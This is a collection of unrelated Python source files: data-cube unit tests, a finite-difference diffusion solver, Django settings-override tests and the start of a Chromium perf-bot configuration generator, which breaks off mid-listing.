self.assertTrue(np.array_equal(d.values, c.values[:, 0: 3: 2]))
def test_compress(self):
c = year_quarter_cube()
d = c.compress(0, [True, False, False])
self.assertTrue(np.array_equal(d.values, [[0, 1, 2, 3]]))
self.assertEqual(d.ndim, 2)
self.assertEqual(tuple(d.dims), ("year", "quarter"))
e = c.compress("quarter", [True, False, True, False])
self.assertTrue(np.array_equal(e.values, [[0, 2], [4, 6], [8, 10]]))
# using numpy array of bools
e = c.compress("quarter", np.arange(1, 4) <= 1)
self.assertTrue(np.array_equal(d.values, [[0, 1, 2, 3]]))
self.assertEqual(d.ndim, 2)
self.assertEqual(d.dims, ("year", "quarter"))
# ints instead of bools; 0 = False, other = True
# similarly for other types; Python bool conversion is used
d = c.compress(0, [1, 0, 0])
self.assertTrue(np.array_equal(d.values, [[0, 1, 2, 3]]))
self.assertEqual(d.ndim, 2)
self.assertEqual(d.dims, ("year", "quarter"))
# wrong length of bool collection - too short ...
d = c.compress(0, [True, False]) # unspecified means False
self.assertTrue(np.array_equal(d.values, [[0, 1, 2, 3]]))
# ... and too long
d = c.compress(0, [True, False, False, False]) # this is OK, the extra False is ignored
self.assertTrue(np.array_equal(d.values, [[0, 1, 2, 3]]))
self.assertRaises(IndexError, c.compress, 0, [True, False, False, True]) # but this is not OK
def test_insert_axis(self):
c = year_quarter_cube()
countries = Axis("country", ["DE", "FR"])
# insert as the first axis
d = c.insert_axis(countries, 0)
self.assertEqual(d.ndim, 3)
self.assertEqual(tuple(d.dims), ("country", "year", "quarter"))
self.assertEqual(d.shape, (2, 3, 4))
# the values in each sub-cube must be equal to the original cube
self.assertTrue((d.take("country", 0) == c).all())
self.assertTrue((d.take("country", 1) == c).all())
# append as the last axis
d = c.insert_axis(countries, -1)
self.assertEqual(d.ndim, 3)
self.assertEqual(tuple(d.dims), ("year", "quarter", "country"))
self.assertEqual(d.shape, (3, 4, 2))
# the values in each sub-cube must be equal to the original cube
self.assertTrue((d.take("country", 0) == c).all())
self.assertTrue((d.take("country", 1) == c).all())
def test_replace_axis(self):
c = year_quarter_cube()
self.assertEqual(c.dims, ("year", "quarter"))
ax = Axis("Y", [2000, 2010, 2020])
d = c.replace_axis("year", ax)
e = c.replace_axis(0, ax)
f = c.replace_axis(c.axis("year"), ax)
self.assertEqual(d.dims, ("Y", "quarter"))
self.assertEqual(d.dims, e.dims)
self.assertEqual(d.dims, f.dims)
self.assertRaises(NonUniqueDimNamesError, c.replace_axis, "year", Axis("quarter", [1, 2, 3]))
self.assertRaises(InvalidAxisLengthError, c.replace_axis, "year", Axis("Y", [2010, 2020]))
self.assertRaises(InvalidAxisLengthError, c.replace_axis, "year", Axis("Y", [2010, 2020, 2030, 2040]))
|
|
# finite-difference implementation of the diffusion equation with first-order
# explicit time discretization
#
# We are solving phi_t = k phi_xx
#
# We run at several resolutions and compute the error. This uses a
# cell-centered finite-difference grid
#
# M. Zingale (2013-04-07)
import numpy
import pylab
import sys
class Grid1d:
def __init__(self, nx, ng=1, xmin=0.0, xmax=1.0):
""" grid class initialization """
self.nx = nx
self.ng = ng
self.xmin = xmin
self.xmax = xmax
self.dx = (xmax - xmin)/nx
self.x = (numpy.arange(nx+2*ng) + 0.5 - ng)*self.dx + xmin
self.ilo = ng
self.ihi = ng+nx-1
# storage for the solution
self.phi = numpy.zeros((nx+2*ng), dtype=numpy.float64)
def fillBC(self):
""" fill the Neumann BCs """
# Neumann BCs
self.phi[0:self.ilo] = self.phi[self.ilo]
self.phi[self.ihi+1:] = self.phi[self.ihi]
def scratch_array(self):
return numpy.zeros((2*self.ng+self.nx), dtype=numpy.float64)
def norm(self, e):
""" return the norm of quantity e which lives on the grid """
if not len(e) == (2*self.ng + self.nx):
return None
return numpy.sqrt(self.dx*numpy.sum(e[self.ilo:self.ihi+1]**2))
def phi_a(t, k, x, xc, t0, phi1, phi2):
""" analytic solution for the diffusion of a Gaussian """
return (phi2 - phi1)*numpy.sqrt(t0/(t + t0)) * \
numpy.exp(-0.25*(x-xc)**2/(k*(t + t0))) + phi1
class Simulation:
def __init__(self, grid, k=1.0):
self.grid = grid
self.t = 0.0
self.k = k # diffusion coefficient
def init_cond(self, name, *args):
if name == "gaussian":
# initialize the data
xc = 0.5*(self.grid.xmin + self.grid.xmax)
t0, phi1, phi2 = args
self.grid.phi[:] = phi_a(0.0, self.k, self.grid.x, xc, t0, phi1, phi2)
def evolve(self, C, tmax):
gr = self.grid
# time info
dt = C*0.5*gr.dx**2/self.k
phinew = gr.scratch_array()
while self.t < tmax:
# make sure we end right at tmax
if self.t + dt > tmax:
dt = tmax - self.t
# fill the boundary conditions
gr.fillBC()
alpha = self.k*dt/gr.dx**2
# loop over zones
i = g.ilo
while (i <= g.ihi):
# explicit diffusion
phinew[i] = gr.phi[i] + \
alpha*(gr.phi[i+1] - 2.0*gr.phi[i] + gr.phi[i-1])
i += 1
# store the updated solution
gr.phi[:] = phinew[:]
self.t += dt
#-----------------------------------------------------------------------------
# diffusion coefficient
k = 1.0
# reference time
t0 = 1.e-4
# state coeffs
phi1 = 1.0
phi2 = 2.0
# solution at multiple times
# a characteristic timescale for diffusion if L^2/k
tmax = 0.0008
nx = 128
C = 0.8
ntimes = 4
tend = tmax/10.0**ntimes
c = ["0.5", "r", "g", "b", "k"]
while tend <= tmax:
g = Grid1d(nx, ng=2)
s = Simulation(g, k=k)
s.init_cond("gaussian", t0, phi1, phi2)
s.evolve(C, tend)
xc = 0.5*(g.xmin + g.xmax)
phi_analytic = phi_a(tend, k, g.x, xc, t0, phi1, phi2)
color = c.pop()
pylab.plot(g.x[g.ilo:g.ihi+1], g.phi[g.ilo:g.ihi+1],
"x", color=color, label="$t = %g$ s" % (tend))
pylab.plot(g.x[g.ilo:g.ihi+1], phi_analytic[g.ilo:g.ihi+1],
color=color, ls=":")
tend = 10.0*tend
pylab.xlim(0.35,0.65)
pylab.legend(frameon=False, fontsize="small")
pylab.xlabel("$x$")
pylab.ylabel(r"$\phi$")
pylab.title("explicit diffusion, nx = %d, C = %3.2f" % (nx, C))
pylab.savefig("diff-explicit-{}.png".format(nx))
#-----------------------------------------------------------------------------
# convergence
# a characteristic timescale for diffusion is L^2/k
tmax = 0.005
t0 = 1.e-4
phi1 = 1.0
phi2 = 2.0
k = 1.0
N = [32, 64, 128, 256, 512]
# CFL number
C = 0.8
err = []
for nx in N:
print nx
# the present C-N discretization
g = Grid1d(nx, ng=1)
s = Simulation(g, k=k)
s.init_cond("gaussian", t0, phi1, phi2)
s.evolve(C, tmax)
xc = 0.5*(g.xmin + g.xmax)
phi_analytic = phi_a(tmax, k, g.x, xc, t0, phi1, phi2)
err.append(g.norm(g.phi - phi_analytic))
pylab.clf()
N = numpy.array(N, dtype=numpy.float64)
err = numpy.array(err)
pylab.scatter(N, err, color="r", label="explicit diffusion")
pylab.loglog(N, err[len(N)-1]*(N[len(N)-1]/N)**2, color="k", label="$\mathcal{O}(\Delta x^2)$")
pylab.xlabel(r"$N$")
pylab.ylabel(r"L2 norm of absolute error")
pylab.title("Convergence of Explicit Diffusion, C = %3.2f, t = %5.2g" % (C, tmax))
pylab.ylim(1.e-6, 1.e-2)
pylab.legend(frameon=False, fontsize="small")
pylab.savefig("diffexplicit-converge-{}.png".format(C))
#-----------------------------------------------------------------------------
# exceed the timestep limit
pylab.clf()
# a characteristic timescale for diffusion if L^2/k
tmax = 0.005
nx = 64
C = 2.0
g = Grid1d(nx, ng=2)
s = Simulation(g, k=k)
s.init_cond("gaussian", t0, phi1, phi2)
s.evolve(C, tend)
xc = 0.5*(g.xmin + g.xmax)
phi_analytic = phi_a(tend, k, g.x, xc, t0, phi1, phi2)
pylab.plot(g.x[g.ilo:g.ihi+1], g.phi[g.ilo:g.ihi+1],
"x-", color="r", label="$t = %g$ s" % (tend))
pylab.plot(g.x[g.ilo:g.ihi+1], phi_analytic[g.ilo:g.ihi+1],
color="0.5", ls=":")
pylab.xlim(0.35,0.65)
pylab.xlabel("$x$")
pylab.ylabel(r"$\phi$")
pylab.title("explicit diffusion, nx = %d, C = %3.2f, t = %5.2g" % (nx, C, tmax))
pylab.savefig("diff-explicit-64-bad.png")
|
|
import os
import sys
import unittest
import warnings
from types import ModuleType
from django.conf import ENVIRONMENT_VARIABLE, LazySettings, Settings, settings
from django.core.exceptions import ImproperlyConfigured
from django.http import HttpRequest
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, modify_settings,
override_settings, signals,
)
@modify_settings(ITEMS={
'prepend': ['b'],
'append': ['d'],
'remove': ['a', 'e']
})
@override_settings(ITEMS=['a', 'c', 'e'], ITEMS_OUTER=[1, 2, 3], TEST='override', TEST_OUTER='outer')
class FullyDecoratedTranTestCase(TransactionTestCase):
available_apps = []
def test_override(self):
self.assertEqual(settings.ITEMS, ['b', 'c', 'd'])
self.assertEqual(settings.ITEMS_OUTER, [1, 2, 3])
self.assertEqual(settings.TEST, 'override')
self.assertEqual(settings.TEST_OUTER, 'outer')
@modify_settings(ITEMS={
'append': ['e', 'f'],
'prepend': ['a'],
'remove': ['d', 'c'],
})
def test_method_list_override(self):
self.assertEqual(settings.ITEMS, ['a', 'b', 'e', 'f'])
self.assertEqual(settings.ITEMS_OUTER, [1, 2, 3])
@modify_settings(ITEMS={
'append': ['b'],
'prepend': ['d'],
'remove': ['a', 'c', 'e'],
})
def test_method_list_override_no_ops(self):
self.assertEqual(settings.ITEMS, ['b', 'd'])
@modify_settings(ITEMS={
'append': 'e',
'prepend': 'a',
'remove': 'c',
})
def test_method_list_override_strings(self):
self.assertEqual(settings.ITEMS, ['a', 'b', 'd', 'e'])
@modify_settings(ITEMS={'remove': ['b', 'd']})
@modify_settings(ITEMS={'append': ['b'], 'prepend': ['d']})
def test_method_list_override_nested_order(self):
self.assertEqual(settings.ITEMS, ['d', 'c', 'b'])
@override_settings(TEST='override2')
def test_method_override(self):
self.assertEqual(settings.TEST, 'override2')
self.assertEqual(settings.TEST_OUTER, 'outer')
def test_decorated_testcase_name(self):
self.assertEqual(FullyDecoratedTranTestCase.__name__, 'FullyDecoratedTranTestCase')
def test_decorated_testcase_module(self):
self.assertEqual(FullyDecoratedTranTestCase.__module__, __name__)
@modify_settings(ITEMS={
'prepend': ['b'],
'append': ['d'],
'remove': ['a', 'e']
})
@override_settings(ITEMS=['a', 'c', 'e'], TEST='override')
class FullyDecoratedTestCase(TestCase):
def test_override(self):
self.assertEqual(settings.ITEMS, ['b', 'c', 'd'])
self.assertEqual(settings.TEST, 'override')
@modify_settings(ITEMS={
'append': 'e',
'prepend': 'a',
'remove': 'c',
})
@override_settings(TEST='override2')
def test_method_override(self):
self.assertEqual(settings.ITEMS, ['a', 'b', 'd', 'e'])
self.assertEqual(settings.TEST, 'override2')
class ClassDecoratedTestCaseSuper(TestCase):
"""
Dummy class for testing max recursion error in child class call to
super(). Refs #17011.
"""
def test_max_recursion_error(self):
pass
@override_settings(TEST='override')
class ClassDecoratedTestCase(ClassDecoratedTestCaseSuper):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.foo = getattr(settings, 'TEST', 'BUG')
def test_override(self):
self.assertEqual(settings.TEST, 'override')
def test_setupclass_override(self):
"""Settings are overridden within setUpClass (#21281)."""
self.assertEqual(self.foo, 'override')
@override_settings(TEST='override2')
def test_method_override(self):
self.assertEqual(settings.TEST, 'override2')
def test_max_recursion_error(self):
"""
Overriding a method on a super class and then calling that method on
the super class should not trigger infinite recursion. See #17011.
"""
super().test_max_recursion_error()
@modify_settings(ITEMS={'append': 'mother'})
@override_settings(ITEMS=['father'], TEST='override-parent')
class ParentDecoratedTestCase(TestCase):
pass
@modify_settings(ITEMS={'append': ['child']})
@override_settings(TEST='override-child')
class ChildDecoratedTestCase(ParentDecoratedTestCase):
def test_override_settings_inheritance(self):
self.assertEqual(settings.ITEMS, ['father', 'mother', 'child'])
self.assertEqual(settings.TEST, 'override-child')
class SettingsTests(SimpleTestCase):
def setUp(self):
self.testvalue = None
signals.setting_changed.connect(self.signal_callback)
def tearDown(self):
signals.setting_changed.disconnect(self.signal_callback)
def signal_callback(self, sender, setting, value, **kwargs):
if setting == 'TEST':
self.testvalue = value
def test_override(self):
settings.TEST = 'test'
self.assertEqual('test', settings.TEST)
with self.settings(TEST='override'):
self.assertEqual('override', settings.TEST)
self.assertEqual('test', settings.TEST)
del settings.TEST
def test_override_change(self):
settings.TEST = 'test'
self.assertEqual('test', settings.TEST)
with self.settings(TEST='override'):
self.assertEqual('override', settings.TEST)
settings.TEST = 'test2'
self.assertEqual('test', settings.TEST)
del settings.TEST
def test_override_doesnt_leak(self):
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
with self.settings(TEST='override'):
self.assertEqual('override', settings.TEST)
settings.TEST = 'test'
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
@override_settings(TEST='override')
def test_decorator(self):
self.assertEqual('override', settings.TEST)
def test_context_manager(self):
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
override = override_settings(TEST='override')
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
override.enable()
self.assertEqual('override', settings.TEST)
override.disable()
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
def test_class_decorator(self):
# SimpleTestCase can be decorated by override_settings, but not ut.TestCase
class SimpleTestCaseSubclass(SimpleTestCase):
pass
class UnittestTestCaseSubclass(unittest.TestCase):
pass
decorated = override_settings(TEST='override')(SimpleTestCaseSubclass)
self.assertIsInstance(decorated, type)
self.assertTrue(issubclass(decorated, SimpleTestCase))
with self.assertRaisesMessage(Exception, "Only subclasses of Django SimpleTestCase"):
decorated = override_settings(TEST='override')(UnittestTestCaseSubclass)
def test_signal_callback_context_manager(self):
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
with self.settings(TEST='override'):
self.assertEqual(self.testvalue, 'override')
self.assertIsNone(self.testvalue)
@override_settings(TEST='override')
def test_signal_callback_decorator(self):
self.assertEqual(self.testvalue, 'override')
#
# Regression tests for #10130: deleting settings.
#
def test_settings_delete(self):
settings.TEST = 'test'
self.assertEqual('test', settings.TEST)
del settings.TEST
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
def test_settings_delete_wrapped(self):
with self.assertRaises(TypeError):
delattr(settings, '_wrapped')
def test_override_settings_delete(self):
"""
Allow deletion of a setting in an overridden settings set (#18824)
"""
previous_i18n = settings.USE_I18N
previous_l10n = settings.USE_L10N
with self.settings(USE_I18N=False):
del settings.USE_I18N
with self.assertRaises(AttributeError):
getattr(settings, 'USE_I18N')
# Should also work for a non-overridden setting
del settings.USE_L10N
with self.assertRaises(AttributeError):
getattr(settings, 'USE_L10N')
self.assertNotIn('USE_I18N', dir(settings))
self.assertNotIn('USE_L10N', dir(settings))
self.assertEqual(settings.USE_I18N, previous_i18n)
self.assertEqual(settings.USE_L10N, previous_l10n)
def test_override_settings_nested(self):
"""
override_settings uses the actual _wrapped attribute at
runtime, not when it was instantiated.
"""
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
with self.assertRaises(AttributeError):
getattr(settings, 'TEST2')
inner = override_settings(TEST2='override')
with override_settings(TEST='override'):
self.assertEqual('override', settings.TEST)
with inner:
self.assertEqual('override', settings.TEST)
self.assertEqual('override', settings.TEST2)
# inner's __exit__ should have restored the settings of the outer
# context manager, not those when the class was instantiated
self.assertEqual('override', settings.TEST)
with self.assertRaises(AttributeError):
getattr(settings, 'TEST2')
with self.assertRaises(AttributeError):
getattr(settings, 'TEST')
with self.assertRaises(AttributeError):
getattr(settings, 'TEST2')
class TestComplexSettingOverride(SimpleTestCase):
def setUp(self):
self.old_warn_override_settings = signals.COMPLEX_OVERRIDE_SETTINGS.copy()
signals.COMPLEX_OVERRIDE_SETTINGS.add('TEST_WARN')
def tearDown(self):
signals.COMPLEX_OVERRIDE_SETTINGS = self.old_warn_override_settings
self.assertNotIn('TEST_WARN', signals.COMPLEX_OVERRIDE_SETTINGS)
def test_complex_override_warning(self):
"""Regression test for #19031"""
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
with override_settings(TEST_WARN='override'):
self.assertEqual(settings.TEST_WARN, 'override')
self.assertEqual(len(w), 1)
self.assertEqual(w[0].filename, __file__)
self.assertEqual(str(w[0].message), 'Overriding setting TEST_WARN can lead to unexpected behavior.')
class SecureProxySslHeaderTest(SimpleTestCase):
@override_settings(SECURE_PROXY_SSL_HEADER=None)
def test_none(self):
req = HttpRequest()
self.assertIs(req.is_secure(), False)
@override_settings(SECURE_PROXY_SSL_HEADER=('HTTP_X_FORWARDED_PROTOCOL', 'https'))
def test_set_without_xheader(self):
req = HttpRequest()
self.assertIs(req.is_secure(), False)
@override_settings(SECURE_PROXY_SSL_HEADER=('HTTP_X_FORWARDED_PROTOCOL', 'https'))
def test_set_with_xheader_wrong(self):
req = HttpRequest()
req.META['HTTP_X_FORWARDED_PROTOCOL'] = 'wrongvalue'
self.assertIs(req.is_secure(), False)
@override_settings(SECURE_PROXY_SSL_HEADER=('HTTP_X_FORWARDED_PROTOCOL', 'https'))
def test_set_with_xheader_right(self):
req = HttpRequest()
req.META['HTTP_X_FORWARDED_PROTOCOL'] = 'https'
self.assertIs(req.is_secure(), True)
class IsOverriddenTest(SimpleTestCase):
def test_configure(self):
s = LazySettings()
s.configure(SECRET_KEY='foo')
self.assertTrue(s.is_overridden('SECRET_KEY'))
def test_module(self):
settings_module = ModuleType('fake_settings_module')
settings_module.SECRET_KEY = 'foo'
sys.modules['fake_settings_module'] = settings_module
try:
s = Settings('fake_settings_module')
self.assertTrue(s.is_overridden('SECRET_KEY'))
self.assertFalse(s.is_overridden('ALLOWED_HOSTS'))
finally:
del sys.modules['fake_settings_module']
def test_override(self):
self.assertFalse(settings.is_overridden('ALLOWED_HOSTS'))
with override_settings(ALLOWED_HOSTS=[]):
self.assertTrue(settings.is_overridden('ALLOWED_HOSTS'))
def test_unevaluated_lazysettings_repr(self):
lazy_settings = LazySettings()
expected = '<LazySettings [Unevaluated]>'
self.assertEqual(repr(lazy_settings), expected)
def test_evaluated_lazysettings_repr(self):
lazy_settings = LazySettings()
module = os.environ.get(ENVIRONMENT_VARIABLE)
expected = '<LazySettings "%s">' % module
# Force evaluation of the lazy object.
lazy_settings.APPEND_SLASH
self.assertEqual(repr(lazy_settings), expected)
def test_usersettingsholder_repr(self):
lazy_settings = LazySettings()
lazy_settings.configure(APPEND_SLASH=False)
expected = '<UserSettingsHolder>'
self.assertEqual(repr(lazy_settings._wrapped), expected)
def test_settings_repr(self):
module = os.environ.get(ENVIRONMENT_VARIABLE)
lazy_settings = Settings(module)
expected = '<Settings "%s">' % module
self.assertEqual(repr(lazy_settings), expected)
class TestListSettings(unittest.TestCase):
"""
Make sure settings that should be lists or tuples throw
ImproperlyConfigured if they are set to a string instead of a list or tuple.
"""
list_or_tuple_settings = (
"INSTALLED_APPS",
"TEMPLATE_DIRS",
"LOCALE_PATHS",
)
def test_tuple_settings(self):
settings_module = ModuleType('fake_settings_module')
settings_module.SECRET_KEY = 'foo'
for setting in self.list_or_tuple_settings:
setattr(settings_module, setting, ('non_list_or_tuple_value'))
sys.modules['fake_settings_module'] = settings_module
try:
with self.assertRaises(ImproperlyConfigured):
Settings('fake_settings_module')
finally:
del sys.modules['fake_settings_module']
delattr(settings_module, setting)
|
|
#!/usr/bin/env vpython
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=too-many-lines
# pylint: disable=line-too-long
"""Generates chromium.perf{,.fyi}.json from a set of condensed configs.
This file contains condensed configurations for the perf bots along with
logic to inflate those into the full (unwieldy) configurations in
//testing/buildbot that are consumed by the chromium recipe code.
"""
from __future__ import print_function
import argparse
import collections
import csv
import filecmp
import json
import os
import re
import shutil
import sys
import tempfile
import textwrap
from chrome_telemetry_build import android_browser_types
from core import benchmark_finders
from core import benchmark_utils
from core import bot_platforms
from core import path_util
from core import undocumented_benchmarks as ub_module
path_util.AddTelemetryToPath()
from telemetry import decorators
# The condensed configurations below get inflated into the perf builder
# configurations in //testing/buildbot. The expected format of these is:
#
# {
# 'builder_name1': {
# # Targets that the builder should compile in addition to those
# # required for tests, as a list of strings.
# 'additional_compile_targets': ['target1', 'target2', ...],
#
# 'tests': [
# {
# # Arguments to pass to the test suite as a list of strings.
# 'extra_args': ['--arg1', '--arg2', ...],
#
# # Name of the isolate to run as a string.
# 'isolate': 'isolate_name',
#
# # Name of the test suite as a string.
# # If not present, will default to `isolate`.
# 'name': 'presentation_name',
#
# # The number of shards for this test as an int.
# # This is only required for GTEST tests since this is defined
# # in bot_platforms.py for Telemetry tests.
# 'num_shards': 2,
#
# # What kind of test this is; for options, see TEST_TYPES
# # below. Defaults to TELEMETRY.
# 'type': TEST_TYPES.TELEMETRY,
# },
# ...
# ],
#
# # Testing platform, as a string. Used in determining the browser
# # argument to pass to telemetry.
# 'platform': 'platform_name',
#
# # Dimensions to pass to swarming, as a dict of string keys & values.
# 'dimension': {
# 'dimension1_name': 'dimension1_value',
# ...
# },
# },
# ...
# }
class TEST_TYPES(object):
GENERIC = 0
GTEST = 1
TELEMETRY = 2
ALL = (GENERIC, GTEST, TELEMETRY)
# This is an opt-in list for tester which will skip the perf data handling.
# The perf data will be handled on a separated 'processor' VM.
# This list will be removed or replace by an opt-out list.
LIGHTWEIGHT_TESTERS = [
'android-go-perf', 'android-pixel2-perf', 'android-pixel2_webview-perf',
'linux-perf', 'mac-10_12_laptop_low_end-perf',
'mac-10_13_laptop_high_end-perf', 'win-10-perf',
'win-10_laptop_low_end-perf'
]
# This is an opt-in list for builders which uses dynamic sharding.
DYNAMIC_SHARDING_TESTERS = [
'android-pixel2-perf', 'android-pixel2-perf-fyi',
'android-pixel2-perf-calibration', 'linux-perf-calibration'
]
CALIBRATION_BUILDERS = {
'linux-perf-calibration': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'linux',
'dimension': {
'gpu': '10de:1cb3-440.100',
'os': 'Ubuntu-18.04',
'pool': 'chrome.tests.perf',
'synthetic_product_name': 'PowerEdge R230 (Dell Inc.)'
},
},
'android-pixel2-perf-calibration': {
'tests': [{
'isolate':
'performance_test_suite_android_clank_monochrome_64_32_bundle',
}],
'platform':
'android-chrome-64-bundle',
'dimension': {
'pool': 'chrome.tests.perf',
'os': 'Android',
'device_type': 'walleye',
'device_os': 'OPM1.171019.021',
'device_os_flavor': 'google',
},
},
}
FYI_BUILDERS = {
'android-cfi-builder-perf-fyi': {
'additional_compile_targets': [
'android_tools',
'cc_perftests',
'chrome_public_apk',
'chromium_builder_perf',
'gpu_perftests',
'push_apps_to_background_apk',
'system_webview_apk',
'system_webview_shell_apk',
],
},
'android-nexus5x-perf-fyi': {
'tests': [{
'isolate':
'performance_test_suite_android_clank_chrome',
'extra_args': [
'--output-format=histograms',
'--experimental-tbmv3-metrics',
],
}],
'platform':
'android-chrome',
'dimension': {
'pool': 'chrome.tests.perf-fyi',
'os': 'Android',
'device_type': 'bullhead',
'device_os': 'MMB29Q',
'device_os_flavor': 'google',
},
},
'android-pixel2-perf-fyi': {
'tests': [{
'isolate':
'performance_test_suite_android_clank_chrome',
'extra_args': [
'--output-format=histograms',
'--experimental-tbmv3-metrics',
],
}],
'platform':
'android-chrome',
'browser':
'bin/monochrome_64_32_bundle',
'dimension': {
'pool': 'chrome.tests.perf-fyi',
'os': 'Android',
'device_type': 'walleye',
'device_os': 'O',
'device_os_flavor': 'google',
},
},
'android-pixel2-perf-aab-fyi': {
'tests': [{
'isolate':
'performance_test_suite_android_clank_monochrome_bundle',
}],
'platform':
'android-chrome-bundle',
'dimension': {
'pool': 'chrome.tests.perf-fyi',
'os': 'Android',
'device_type': 'walleye',
'device_os': 'O',
'device_os_flavor': 'google',
},
},
'android_arm64-cfi-builder-perf-fyi': {
'additional_compile_targets': [
'android_tools',
'cc_perftests',
'chrome_public_apk',
'chromium_builder_perf',
'gpu_perftests',
'push_apps_to_background_apk',
'system_webview_apk',
'system_webview_shell_apk',
],
},
'linux-perf-fyi': {
'tests': [{
'isolate':
'performance_test_suite',
'extra_args': [
'--output-format=histograms',
'--experimental-tbmv3-metrics',
],
}],
'platform':
'linux',
'dimension': {
'gpu': '10de',
'id': 'build186-b7',
'os': 'Ubuntu-14.04',
'pool': 'chrome.tests.perf-fyi',
},
},
'fuchsia-perf-fyi': {
'tests': [{
'isolate':
'performance_web_engine_test_suite',
'extra_args': [
'--output-format=histograms',
'--experimental-tbmv3-metrics',
'-d',
'--system-image-dir=../../third_party/fuchsia-sdk/images-internal/astro-release/smart_display_eng_arrested',
'--os-check=update',
],
'type':
TEST_TYPES.TELEMETRY,
}],
'platform':
'fuchsia',
'dimension': {
'cpu': None,
'device_type': 'Astro',
'os': 'Fuchsia',
'pool': 'chrome.tests',
},
},
'win-10_laptop_low_end-perf_HP-Candidate': {
'tests': [
{
'isolate':
'performance_test_suite',
'extra_args': [
'--output-format=histograms',
'--experimental-tbmv3-metrics',
],
},
],
'platform':
'win',
'target_bits':
64,
'dimension': {
'pool': 'chrome.tests.perf-fyi',
'id': 'build370-a7',
# TODO(crbug.com/971204): Explicitly set the gpu to None to make
# chromium_swarming recipe_module ignore this dimension.
'gpu': None,
'os': 'Windows-10',
},
},
'chromeos-kevin-builder-perf-fyi': {
'additional_compile_targets': ['chromium_builder_perf'],
},
'chromeos-kevin-perf-fyi': {
'tests': [
{
'isolate':
'performance_test_suite',
'extra_args': [
# The magic hostname that resolves to a CrOS device in the test lab
'--remote=variable_chromeos_device_hostname',
],
},
],
'platform':
'chromeos',
'target_bits':
32,
'dimension': {
'pool': 'chrome.tests',
# TODO(crbug.com/971204): Explicitly set the gpu to None to make
# chromium_swarming recipe_module ignore this dimension.
'gpu': None,
'os': 'ChromeOS',
'device_type': 'kevin',
},
},
'fuchsia-builder-perf-fyi': {
'additional_compile_targets': [
'web_engine_shell_pkg', 'cast_runner_pkg', 'web_runner_pkg',
'chromedriver', 'chromium_builder_perf'
],
},
}
# These configurations are taken from chromium_perf.py in
# build/scripts/slave/recipe_modules/chromium_tests and must be kept in sync
# to generate the correct json for each tester
#
# The dimensions in pinpoint configs, excluding the dimension "pool",
# must be kept in sync with the dimensions here.
# This is to make sure the same type of machines are used between waterfall
# tests and pinpoint jobs
#
# On desktop builders, chromedriver is added as an additional compile target.
# The perf waterfall builds this target for each commit, and the resulting
# ChromeDriver is archived together with Chrome for use in bisecting.
# This can be used by Chrome test team, as well as by google3 teams for
# bisecting Chrome builds with their web tests. For questions or to report
# issues, please contact johnchen@chromium.org.
BUILDERS = {
'android-builder-perf': {
'additional_compile_targets': [
'microdump_stackwalk',
'chrome_apk',
'system_webview_google_apk',
'android_tools',
'cc_perftests',
'chrome_public_apk',
'chromium_builder_perf',
'dump_syms',
'gpu_perftests',
'push_apps_to_background_apk',
'system_webview_apk',
'system_webview_shell_apk',
],
'tests': [
{
'name': 'resource_sizes_monochrome_minimal_apks',
'isolate': 'resource_sizes_monochrome_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_monochrome_public_minimal_apks',
'isolate': 'resource_sizes_monochrome_public_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_chrome_modern_minimal_apks',
'isolate': 'resource_sizes_chrome_modern_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_chrome_modern_public_minimal_apks',
'isolate': 'resource_sizes_chrome_modern_public_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_trichrome_google',
'isolate': 'resource_sizes_trichrome_google',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_system_webview_bundle',
'isolate': 'resource_sizes_system_webview_bundle',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_system_webview_google_bundle',
'isolate': 'resource_sizes_system_webview_google_bundle',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
],
'dimension': {
'cpu': 'x86',
'os': 'Ubuntu-16.04',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'android_arm64-builder-perf': {
'additional_compile_targets': [
'microdump_stackwalk',
'chrome_apk',
'system_webview_google_apk',
'android_tools',
'cc_perftests',
'chrome_public_apk',
'chromium_builder_perf',
'gpu_perftests',
'push_apps_to_background_apk',
'system_webview_apk',
'system_webview_shell_apk',
'telemetry_weblayer_apks',
],
'tests': [
{
'name': 'resource_sizes_monochrome_minimal_apks',
'isolate': 'resource_sizes_monochrome_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_monochrome_public_minimal_apks',
'isolate': 'resource_sizes_monochrome_public_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_chrome_modern_minimal_apks',
'isolate': 'resource_sizes_chrome_modern_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_chrome_modern_public_minimal_apks',
'isolate': 'resource_sizes_chrome_modern_public_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_trichrome',
'isolate': 'resource_sizes_trichrome',
